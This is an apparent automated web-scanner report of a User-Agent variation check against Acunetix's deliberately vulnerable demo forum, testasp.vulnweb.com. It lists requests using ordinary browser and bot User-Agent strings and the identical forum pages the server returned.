style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| Evidence | |
| Request Header - size: 252 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Pragma: no-cache Cache-Control: no-cache Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:52 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) |
| Evidence | |
| Request Header - size: 252 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Pragma: no-cache Cache-Control: no-cache Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:52 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) |
| Evidence | |
| Request Header - size: 252 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Pragma: no-cache Cache-Control: no-cache Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:51 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
| Evidence | |
| Request Header - size: 274 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Pragma: no-cache Cache-Control: no-cache Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:52 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) |
| Evidence | |
| Request Header - size: 285 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Pragma: no-cache Cache-Control: no-cache Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:54 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 |
| Evidence | |
| Request Header - size: 343 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Pragma: no-cache Cache-Control: no-cache Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:54 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | msnbot/1.1 (+http://search.msn.com/msnbot.htm) |
| Evidence | |
| Request Header - size: 248 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:52 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/avatars |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| Evidence | |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/avatars HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:54 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
